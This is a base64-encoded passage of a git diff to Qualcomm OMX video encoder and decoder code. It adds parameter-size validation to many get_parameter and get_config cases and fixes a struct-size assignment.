GEsIE9NWF9DT05GSUdfUkVDVFRZUEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NWF9DT05GSUdfUkVDVFRZUEUgKnJlY3QgPSAoT01YX0NPTkZJR19SRUNUVFlQRSAqKSBjb25maWdEYXRhOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1lbWNweShyZWN0LCAmcmVjdGFuZ2xlLCBzaXplb2YoT01YX0NPTkZJR19SRUNUVFlQRSkpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0hJR0goImdldF9jb25maWc6IGNyb3AgaW5mbzogTDogJXUsIFQ6ICV1LCBSOiAldSwgQjogJXUiLApAQCAtNDE2Niw2ICs0MjA3LDcgQEAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfUWNvbUluZGV4Q29uZmlnUGVyZkxldmVsOiB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEoY29uZmlnRGF0YSwgT01YX1FDT01fVklERU9fQ09ORklHX1BFUkZfTEVWRUwpOwogICAgICAgICAgICAgICAgIHN0cnVjdCB2NGwyX2NvbnRyb2wgY29udHJvbDsKICAgICAgICAgICAgICAgICBPTVhfUUNPTV9WSURFT19DT05GSUdfUEVSRl9MRVZFTCAqcGVyZiA9CiAgICAgICAgICAgICAgICAgICAgICAgICAoT01YX1FDT01fVklERU9fQ09ORklHX1BFUkZfTEVWRUwgKiljb25maWdEYXRhOwpAQCAtNDE5MSw3ICs0MjMzLDcgQEAKICAgICAgICAgICAgICAgICB9CiAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KKyAgICAgICAgfQogICAgICAgICBkZWZhdWx0OiB7CiAgICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0VSUk9SKCJnZXRfY29uZmlnOiB1bmtub3duIHBhcmFtICVkIixjb25maWdJbmRleCk7CiAgICAgICAgICAgICAgICAgIGVSZXQgPSBPTVhfRXJyb3JCYWRQYXJhbWV0ZXI7CkBAIC00MzM3LDYgKzQzNzksNyBAQAogICAgICAgICBzdHJ1Y3QgdjRsMl9jb250cm9sIHRlbXA7CiAgICAgICAgIHRlbXAuaWQgPSBWNEwyX0NJRF9NUEVHX1ZJRENfVklERU9fU1RSRUFNX0ZPUk1BVDsKIAorICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShjb25maWdEYXRhLCBPTVhfVklERU9fQ09ORklHX05BTFNJWkUpOwogICAgICAgICBwTmFsID0gcmVpbnRlcnByZXRfY2FzdCA8IE9NWF9WSURFT19DT05GSUdfTkFMU0laRSAqID4oY29uZmlnRGF0YSk7CiAgICAgICAgIHN3aXRjaCAocE5hbC0+bk5hbHVCeXRlcykgewogICAgICAgICAgICAgY2FzZSAwOgpAQCAtODc1Miw3ICs4Nzk1LDcgQEAKICAgICB9CiAgICAgREVCVUdfUFJJTlRfTE9XKCJvbXhfdmRlYzo6dXBkYXRlX3BvcnRkZWYiKTsKICAgICBwb3J0RGVmbi0+blZlcnNpb24ublZlcnNpb24gPSBPTVhfU1BFQ19WRVJTSU9OOwotICAgIHBvcnREZWZuLT5uU2l6ZSA9IHNpemVvZihwb3J0RGVmbik7CisgICAgcG9ydERlZm4tPm5TaXplID0gc2l6ZW9mKE9NWF9QQVJBTV9QT1JUREVGSU5JVElPTlRZUEUpOwogICAgIHBvcnREZWZuLT5lRG9tYWluICAgID0gT01YX1BvcnREb21haW5WaWRlbzsKICAgICBpZiAoZHJ2X2N0eC5mcmFtZV9yYXRlLmZwc19kZW5vbWluYXRvciA+IDApCiAgICAgICAgIHBvcnREZWZuLT5mb3JtYXQudmlkZW8ueEZyYW1lcmF0ZSA9IChkcnZfY3R4LmZyYW1lX3JhdGUuZnBzX251bWVyYXRvciAvCmRpZmYgLS1naXQgYS9tbS12aWRlby12NGwyL3ZpZGMvdmVuYy9zcmMvb214X3ZpZGVvX2Jhc2UuY3BwIGIvbW0tdmlkZW8tdjRsMi92aWRjL3ZlbmMvc3JjL29teF92aWRlb19iYXNlLmNwcAppbmRleCA3ZjA0ODJmLi4xYWVlMmMxIDEwMDY0NAotLS0gYS9tbS12aWRlby12NGwyL3ZpZGMvdmVuYy9zcmMvb214X3ZpZGVvX2Jhc2UuY3BwCisrKyBiL21tLXZpZGVvLXY0bDIvdmlkYy92ZW5jL3NyYy9vbXhfdmlkZW9fYmFzZS5jcHAKQEAgLTg0LDYgKzg0LDggQEAKIAogdHlwZWRlZiBzdHJ1Y3QgT01YQ29tcG9uZW50Q2FwYWJpbGl0eUZsYWdzVHlwZSB7CiAgICAgLy8vLy8vLy8vLy8vLy8vLy8vIE9NWCBDT01QT05FTlQgQ0FQQUJJTElUWSBSRUxBVEVEIE1FTUJFUlMKKyAgICBPTVhfVTMyIG5TaXplOworICAgIE9NWF9WRVJTSU9OVFlQRSBuVmVyc2lvbjsKICAgICBPTVhfQk9PTCBpSXNPTVhDb21wb25lbnRNdWx0aVRocmVhZGVkOwogICAgIE9NWF9CT09MIGlPTVhDb21wb25lbnRTdXBwb3J0c0V4dGVybmFsT3V0cHV0QnVmZmVyQWxsb2M7CiAgICAgT01YX0JPT0wgaU9NWENvbXBvbmVudFN1cHBvcnRzRXh0ZXJuYWxJbnB1dEJ1ZmZlckFsbG9jOwpAQCAtMTQ0Myw2ICsxNDQ1LDcgQEAKICAgICBzd2l0Y2ggKChpbnQpcGFyYW1JbmRleCkgewogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtUG9ydERlZmluaXRpb246CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFICpwb3J0RGVmbjsKICAgICAgICAgICAgICAgICBwb3J0RGVmbiA9IChPTVhfUEFSQU1fUE9SVERFRklOSVRJT05UWVBFICopIHBhcmFtRGF0YTsKIApAQCAtMTQ4NCw2ICsxNDg3LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVZpZGVvSW5pdDoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QT1JUX1BBUkFNX1RZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9QT1JUX1BBUkFNX1RZUEUgKnBvcnRQYXJhbVR5cGUgPQogICAgICAgICAgICAgICAgICAgICAoT01YX1BPUlRfUEFSQU1fVFlQRSAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvSW5pdCIpOwpAQCAtMTQ5Myw2ICsxNDk3LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVZpZGVvUG9ydEZvcm1hdDoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9QT1JURk9STUFUVFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX1BPUlRGT1JNQVRUWVBFICpwb3J0Rm10ID0KICAgICAgICAgICAgICAgICAgICAgKE9NWF9WSURFT19QQVJBTV9QT1JURk9STUFUVFlQRSAqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtVmlkZW9Qb3J0Rm9ybWF0Iik7CkBAIC0xNTI3LDYgKzE1MzIsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9CaXRyYXRlOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1ZJREVPX1BBUkFNX0JJVFJBVEVUWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fQklUUkFURVRZUEUqIHBQYXJhbSA9IChPTVhfVklERU9fUEFSQU1fQklUUkFURVRZUEUqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtVmlkZW9CaXRyYXRlIik7CiAKQEAgLTE1NDEsNiArMTU0Nyw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1WaWRlb01wZWc0OgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1ZJREVPX1BBUkFNX01QRUc0VFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX01QRUc0VFlQRSogcFBhcmFtID0gKE9NWF9WSURFT19QQVJBTV9NUEVHNFRZUEUqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtVmlkZW9NcGVnNCIpOwogICAgICAgICAgICAgICAgIG1lbWNweShwUGFyYW0sICZtX3NQYXJhbU1QRUc0LCBzaXplb2YobV9zUGFyYW1NUEVHNCkpOwpAQCAtMTU0OCw2ICsxNTU1LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVZpZGVvSDI2MzoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9IMjYzVFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX0gyNjNUWVBFKiBwUGFyYW0gPSAoT01YX1ZJREVPX1BBUkFNX0gyNjNUWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvSDI2MyIpOwogICAgICAgICAgICAgICAgIG1lbWNweShwUGFyYW0sICZtX3NQYXJhbUgyNjMsIHNpemVvZihtX3NQYXJhbUgyNjMpKTsKQEAgLTE1NTUsNiArMTU2Myw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1WaWRlb0F2YzoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9BVkNUWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fQVZDVFlQRSogcFBhcmFtID0gKE9NWF9WSURFT19QQVJBTV9BVkNUWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvQXZjIik7CiAgICAgICAgICAgICAgICAgbWVtY3B5KHBQYXJhbSwgJm1fc1BhcmFtQVZDLCBzaXplb2YobV9zUGFyYW1BVkMpKTsKQEAgLTE1NjIsNiArMTU3MSw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgKE9NWF9JTkRFWFRZUEUpT01YX0luZGV4UGFyYW1WaWRlb1ZwODoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9WUDhUWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fVlA4VFlQRSogcFBhcmFtID0gKE9NWF9WSURFT19QQVJBTV9WUDhUWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvVnA4Iik7CiAgICAgICAgICAgICAgICAgbWVtY3B5KHBQYXJhbSwgJm1fc1BhcmFtVlA4LCBzaXplb2YobV9zUGFyYW1WUDgpKTsKQEAgLTE1NjksNiArMTU3OSw3IEBACiAgICAgICAgICAgICB9CiAgICAgICAgIGNhc2UgKE9NWF9JTkRFWFRZUEUpT01YX0luZGV4UGFyYW1WaWRlb0hldmM6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fSEVWQ1RZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19QQVJBTV9IRVZDVFlQRSogcFBhcmFtID0gKE9NWF9WSURFT19QQVJBTV9IRVZDVFlQRSopcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X3BhcmFtZXRlcjogT01YX0luZGV4UGFyYW1WaWRlb0hldmMiKTsKICAgICAgICAgICAgICAgICBtZW1jcHkocFBhcmFtLCAmbV9zUGFyYW1IRVZDLCBzaXplb2YobV9zUGFyYW1IRVZDKSk7CkBAIC0xNTc2LDYgKzE1ODcsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9Qcm9maWxlTGV2ZWxRdWVyeVN1cHBvcnRlZDoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fUFJPRklMRUxFVkVMVFlQRSogcFBhcmFtID0gKE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvUHJvZmlsZUxldmVsUXVlcnlTdXBwb3J0ZWQiKTsKICAgICAgICAgICAgICAgICBlUmV0ID0gZ2V0X3N1cHBvcnRlZF9wcm9maWxlX2xldmVsKHBQYXJhbSk7CkBAIC0xNTg2LDYgKzE1OTgsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9Qcm9maWxlTGV2ZWxDdXJyZW50OgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1ZJREVPX1BBUkFNX1BST0ZJTEVMRVZFTFRZUEUpOwogICAgICAgICAgICAgICAgIE9NWF9WSURFT19QQVJBTV9QUk9GSUxFTEVWRUxUWVBFKiBwUGFyYW0gPSAoT01YX1ZJREVPX1BBUkFNX1BST0ZJTEVMRVZFTFRZUEUqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtVmlkZW9Qcm9maWxlTGV2ZWxDdXJyZW50Iik7CiAgICAgICAgICAgICAgICAgbWVtY3B5KHBQYXJhbSwgJm1fc1BhcmFtUHJvZmlsZUxldmVsLCBzaXplb2YobV9zUGFyYW1Qcm9maWxlTGV2ZWwpKTsKQEAgLTE1OTQsNiArMTYwNyw3IEBACiAgICAgICAgICAgICAvKkNvbXBvbmVudCBzaG91bGQgc3VwcG9ydCB0aGlzIHBvcnQgZGVmaW5pdGlvbiovCiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1BdWRpb0luaXQ6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUE9SVF9QQVJBTV9UWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfUE9SVF9QQVJBTV9UWVBFICphdWRpb1BvcnRQYXJhbVR5cGUgPSAoT01YX1BPUlRfUEFSQU1fVFlQRSAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbUF1ZGlvSW5pdCIpOwogICAgICAgICAgICAgICAgIG1lbWNweShhdWRpb1BvcnRQYXJhbVR5cGUsICZtX3NQb3J0UGFyYW1fYXVkaW8sIHNpemVvZihtX3NQb3J0UGFyYW1fYXVkaW8pKTsKQEAgLTE2MDIsNiArMTYxNiw3IEBACiAgICAgICAgICAgICAvKkNvbXBvbmVudCBzaG91bGQgc3VwcG9ydCB0aGlzIHBvcnQgZGVmaW5pdGlvbiovCiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1JbWFnZUluaXQ6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfUE9SVF9QQVJBTV9UWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfUE9SVF9QQVJBTV9UWVBFICppbWFnZVBvcnRQYXJhbVR5cGUgPSAoT01YX1BPUlRfUEFSQU1fVFlQRSAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbUltYWdlSW5pdCIpOwogICAgICAgICAgICAgICAgIG1lbWNweShpbWFnZVBvcnRQYXJhbVR5cGUsICZtX3NQb3J0UGFyYW1faW1nLCBzaXplb2YobV9zUG9ydFBhcmFtX2ltZykpOwpAQCAtMTYxNyw2ICsxNjMyLDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBPTVhfSW5kZXhQYXJhbVN0YW5kYXJkQ29tcG9uZW50Um9sZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QQVJBTV9DT01QT05FTlRST0xFVFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX1BBUkFNX0NPTVBPTkVOVFJPTEVUWVBFICpjb21wX3JvbGU7CiAgICAgICAgICAgICAgICAgY29tcF9yb2xlID0gKE9NWF9QQVJBTV9DT01QT05FTlRST0xFVFlQRSAqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgY29tcF9yb2xlLT5uVmVyc2lvbi5uVmVyc2lvbiA9IE9NWF9TUEVDX1ZFUlNJT047CkBAIC0xNjI5LDcgKzE2NDUsNyBAQAogICAgICAgICAgICAgLyogQWRkZWQgZm9yIHBhcmFtZXRlciB0ZXN0ICovCiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1Qcmlvcml0eU1nbXQ6CiAgICAgICAgICAgICB7Ci0KKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9QUklPUklUWU1HTVRUWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfUFJJT1JJVFlNR01UVFlQRSAqcHJpb3JpdHlNZ21UeXBlID0gKE9NWF9QUklPUklUWU1HTVRUWVBFICopIHBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9JbmRleFBhcmFtUHJpb3JpdHlNZ210Iik7CiAgICAgICAgICAgICAgICAgbWVtY3B5KHByaW9yaXR5TWdtVHlwZSwgJm1fc1ByaW9yaXR5TWdtdCwgc2l6ZW9mKG1fc1ByaW9yaXR5TWdtdCkpOwpAQCAtMTYzOCw2ICsxNjU0LDcgQEAKICAgICAgICAgICAgIC8qIEFkZGVkIGZvciBwYXJhbWV0ZXIgdGVzdCAqLwogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtQ29tcEJ1ZmZlclN1cHBsaWVyOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YX1BBUkFNX0JVRkZFUlNVUFBMSUVSVFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX1BBUkFNX0JVRkZFUlNVUFBMSUVSVFlQRSAqYnVmZmVyU3VwcGxpZXJUeXBlID0gKE9NWF9QQVJBTV9CVUZGRVJTVVBQTElFUlRZUEUqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbUNvbXBCdWZmZXJTdXBwbGllciIpOwogICAgICAgICAgICAgICAgIGlmIChidWZmZXJTdXBwbGllclR5cGUtPm5Qb3J0SW5kZXggPT0oT01YX1UzMikgUE9SVF9JTkRFWF9JTikgewpAQCAtMTY1Myw2ICsxNjcwLDcgQEAKIAogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9RdWFudGl6YXRpb246CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fUVVBTlRJWkFUSU9OVFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX1FVQU5USVpBVElPTlRZUEUgKnNlc3Npb25fcXAgPSAoT01YX1ZJREVPX1BBUkFNX1FVQU5USVpBVElPTlRZUEUqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfSW5kZXhQYXJhbVZpZGVvUXVhbnRpemF0aW9uIik7CiAgICAgICAgICAgICAgICAgbWVtY3B5KHNlc3Npb25fcXAsICZtX3NTZXNzaW9uUXVhbnRpemF0aW9uLCBzaXplb2YobV9zU2Vzc2lvblF1YW50aXphdGlvbikpOwpAQCAtMTY2MSw2ICsxNjc5LDcgQEAKIAogICAgICAgICBjYXNlIE9NWF9RY29tSW5kZXhQYXJhbVZpZGVvUVBSYW5nZToKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9RQ09NX1ZJREVPX1BBUkFNX1FQUkFOR0VUWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfUUNPTV9WSURFT19QQVJBTV9RUFJBTkdFVFlQRSAqcXBfcmFuZ2UgPSAoT01YX1FDT01fVklERU9fUEFSQU1fUVBSQU5HRVRZUEUqKSBwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJnZXRfcGFyYW1ldGVyOiBPTVhfUWNvbUluZGV4UGFyYW1WaWRlb1FQUmFuZ2UiKTsKICAgICAgICAgICAgICAgICBtZW1jcHkocXBfcmFuZ2UsICZtX3NTZXNzaW9uUVBSYW5nZSwgc2l6ZW9mKG1fc1Nlc3Npb25RUFJhbmdlKSk7CkBAIC0xNjY5LDYgKzE2ODgsNyBAQAogCiAgICAgICAgIGNhc2UgT01YX0luZGV4UGFyYW1WaWRlb0Vycm9yQ29ycmVjdGlvbjoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9WSURFT19QQVJBTV9FUlJPUkNPUlJFQ1RJT05UWVBFKTsKICAgICAgICAgICAgICAgICBPTVhfVklERU9fUEFSQU1fRVJST1JDT1JSRUNUSU9OVFlQRSogZXJyb3JyZXNpbGllbmNlID0gKE9NWF9WSURFT19QQVJBTV9FUlJPUkNPUlJFQ1RJT05UWVBFKilwYXJhbURhdGE7CiAgICAgICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJPTVhfSW5kZXhQYXJhbVZpZGVvRXJyb3JDb3JyZWN0aW9uIik7CiAgICAgICAgICAgICAgICAgZXJyb3JyZXNpbGllbmNlLT5iRW5hYmxlSEVDID0gbV9zRXJyb3JDb3JyZWN0aW9uLmJFbmFibGVIRUM7CkBAIC0xNjc4LDYgKzE2OTgsNyBAQAogICAgICAgICAgICAgfQogICAgICAgICBjYXNlIE9NWF9JbmRleFBhcmFtVmlkZW9JbnRyYVJlZnJlc2g6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBPTVhfVklERU9fUEFSQU1fSU5UUkFSRUZSRVNIVFlQRSk7CiAgICAgICAgICAgICAgICAgT01YX1ZJREVPX1BBUkFNX0lOVFJBUkVGUkVTSFRZUEUqIGludHJhcmVmcmVzaCA9IChPTVhfVklERU9fUEFSQU1fSU5UUkFSRUZSRVNIVFlQRSopcGFyYW1EYXRhOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiT01YX0luZGV4UGFyYW1WaWRlb0ludHJhUmVmcmVzaCIpOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0VSUk9SKCJPTVhfSW5kZXhQYXJhbVZpZGVvSW50cmFSZWZyZXNoIEdFVCIpOwpAQCAtMTY5MCw2ICsxNzExLDcgQEAKICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICBjYXNlIE9NWF9DT01QT05FTlRfQ0FQQUJJTElUWV9UWVBFX0lOREVYOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgT01YQ29tcG9uZW50Q2FwYWJpbGl0eUZsYWdzVHlwZSk7CiAgICAgICAgICAgICAgICAgT01YQ29tcG9uZW50Q2FwYWJpbGl0eUZsYWdzVHlwZSAqcFBhcmFtID0gcmVpbnRlcnByZXRfY2FzdDxPTVhDb21wb25lbnRDYXBhYmlsaXR5RmxhZ3NUeXBlKj4ocGFyYW1EYXRhKTsKICAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coImdldF9wYXJhbWV0ZXI6IE9NWF9DT01QT05FTlRfQ0FQQUJJTElUWV9UWVBFX0lOREVYIik7CiAgICAgICAgICAgICAgICAgcFBhcmFtLT5pSXNPTVhDb21wb25lbnRNdWx0aVRocmVhZGVkID0gT01YX1RSVUU7CkBAIC0xNzA3LDYgKzE3MjksNyBAQAogI2lmICFkZWZpbmVkKE1BWF9SRVNfNzIwUCkgfHwgZGVmaW5lZChfTVNNODk3NF8pCiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBhcmFtSW5kZXhFeHRyYURhdGFUeXBlOgogICAgICAgICAgICAgeworICAgICAgICAgICAgICAgIFZBTElEQVRFX09NWF9QQVJBTV9EQVRBKHBhcmFtRGF0YSwgUU9NWF9JTkRFWEVYVFJBREFUQVRZUEUpOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygiZ2V0X3BhcmFtZXRlcjogT01YX1Fjb21JbmRleFBhcmFtSW5kZXhFeHRyYURhdGFUeXBlIik7CiAgICAgICAgICAgICAgICAgUU9NWF9JTkRFWEVYVFJBREFUQVRZUEUgKnBQYXJhbSA9IChRT01YX0lOREVYRVhUUkFEQVRBVFlQRSAqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBpZiAocFBhcmFtLT5uSW5kZXggPT0gKE9NWF9JTkRFWFRZUEUpT01YX0V4dHJhRGF0YVZpZGVvRW5jb2RlclNsaWNlSW5mbykgewpAQCAtMTc1Miw2ICsxNzc1LDcgQEAKICAgICAgICAgICAgIH0KICAgICAgICAgY2FzZSBRT01YX0luZGV4UGFyYW1WaWRlb0xUUkNvdW50UmFuZ2VTdXBwb3J0ZWQ6CiAgICAgICAgICAgICB7CisgICAgICAgICAgICAgICAgVkFMSURBVEVfT01YX1BBUkFNX0RBVEEocGFyYW1EYXRhLCBRT01YX0VYVE5JTkRFWF9SQU5HRVRZUEUpOwogICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0hJR0goImdldF9wYXJhbWV0ZXI6IFFPTVhfSW5kZXhQYXJhbVZpZGVvTFRSQ291bnRSYW5nZVN1cHBvcnRlZCIpOwogICAgICAgICAgICAgICAgIFFPTVhfRVhUTklOREVYX1JBTkdFVFlQRSAqcFBhcmFtID0gKFFPTVhfRVhUTklOREVYX1JBTkdFVFlQRSAqKXBhcmFtRGF0YTsKICAgICAgICAgICAgICAgICBpZiAocFBhcmFtLT5uUG9ydEluZGV4ID09IFBPUlRfSU5ERVhfT1VUKSB7CkBAIC0xNzcyLDYgKzE3OTYsNyBAQAogICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgIGNhc2UgT01YX1Fjb21JbmRleFBhcmFtVmlkZW9MVFJDb3VudDoKICAgICAgICAgICAgIHsKKyAgICAgICAgICAgICAgICBWQUxJREFURV9PTVhfUEFSQU1fREFUQShwYXJhbURhdGEsIE9NWF9RQ09NX1ZJREVPX1BBUkFNX0xUUkNPVU5UX1RZUEUpOwo